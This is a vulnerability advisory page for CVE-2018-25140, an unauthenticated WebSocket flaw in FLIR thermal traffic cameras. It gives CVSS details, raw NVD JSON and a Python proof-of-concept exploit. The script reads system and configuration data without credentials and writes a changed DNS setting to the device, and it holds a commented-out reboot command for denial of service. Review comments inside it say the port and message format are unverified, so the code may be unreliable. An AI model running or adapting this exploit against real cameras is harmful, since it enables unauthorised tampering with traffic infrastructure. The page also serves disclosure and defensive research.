Security Vulnerability Report
CVE-2018-25140 CVSS 7.5 HIGH

CVE-2018-25140

Published: 2025-12-24 20:15:48
Last Modified: 2026-04-15 00:35:42

Description

FLIR thermal traffic cameras contain an unauthenticated device manipulation vulnerability in their WebSocket implementation that allows attackers to bypass authentication and authorization controls. Attackers can directly modify device configurations, access system information, and potentially initiate denial of service by sending crafted WebSocket messages without authentication.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
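CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Note: this v3.1 vector scores confidentiality impact only (I:N/A:N), although the description also covers configuration changes and denial of service. The CVSS 4.0 entry in the raw JSON below rates the same issue 9.3 CRITICAL with VC:H/VI:H/VA:H, so the 7.5 figure should not be the only input to prioritisation.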

Configurations (Affected Products)

No configuration data available.

FLIR thermal traffic cameras with WebSocket service enabled (all versions prior to patch)
Specific models: FLIR ITS series thermal traffic cameras

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
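import websocket
import json
import time

# CVE-2018-25140 PoC - FLIR Thermal Traffic Camera WebSocket Authentication Bypass
# Target: FLIR thermal traffic cameras with vulnerable WebSocket implementation
#
# NOTE(review): the advisory text on this page only states that crafted
# WebSocket messages are accepted without authentication (CWE-306). It does
# not document the port or the message schema used below, so the
# "action"/"resource" payloads and the 7682 default are unverified against
# the vendor protocol -- confirm against the referenced advisories.


def exploit_flir_camera(target_ip, target_port=7682):
    """
    Exploit for CVE-2018-25140 - Unauthenticated WebSocket access to FLIR cameras

    Opens a plain ``ws://`` connection with no credentials, sends two read
    requests and one write request as JSON text frames, and prints each reply
    verbatim.

    Parameters:
    - target_ip: IP address of the vulnerable FLIR camera
    - target_port: WebSocket port (default: 7682)

    Returns:
    - True if every send/recv completed, False if any step raised.

    NOTE(review): replies are printed, not inspected. A "[+]" line therefore
    only shows that a frame came back, not that the device honoured the
    request; read the response bodies before drawing a conclusion.
    """
    ws_url = f"ws://{target_ip}:{target_port}"
    print(f"[*] Connecting to {ws_url}...")

    ws = None
    try:
        # Establish WebSocket connection without authentication
        ws = websocket.create_connection(ws_url, timeout=10)
        print("[+] Connected successfully - No authentication required!")

        # Enumerate system information
        info_cmd = {"action": "get", "resource": "system_info"}
        ws.send(json.dumps(info_cmd))
        response = ws.recv()
        print(f"[+] System Info Response: {response}")

        # Read device configuration
        config_cmd = {"action": "get", "resource": "device_config"}
        ws.send(json.dumps(config_cmd))
        response = ws.recv()
        print(f"[+] Device Config Response: {response}")

        # Modify device configuration (integrity impact)
        # This request writes to the device: if accepted it replaces the
        # configured DNS resolver, and this script does not revert it. The two
        # read requests above already show whether unauthenticated messages
        # are answered.
        modify_cmd = {
            "action": "set",
            "resource": "network_config",
            "data": {"dns": "8.8.8.8"},
        }
        ws.send(json.dumps(modify_cmd))
        response = ws.recv()
        print(f"[+] Config Modification Response: {response}")

        # Denial of Service test (commented out for safety)
        # dos_cmd = {"action": "reboot"}
        # ws.send(json.dumps(dos_cmd))

        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False
    finally:
        # Close on every path; the original skipped close() whenever a
        # send/recv raised, leaving the socket open until interpreter exit.
        if ws is not None:
            ws.close()


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 7682
    exploit_flir_camera(target, port)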

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25140", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:48.113", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FLIR thermal traffic cameras contain an unauthenticated device manipulation vulnerability in their WebSocket implementation that allows attackers to bypass authentication and authorization controls. Attackers can directly modify device configurations, access system information, and potentially initiate denial of service by sending crafted WebSocket messages without authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/45539", "source": "[email protected]"}, {"url": "https://www.flir.com", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}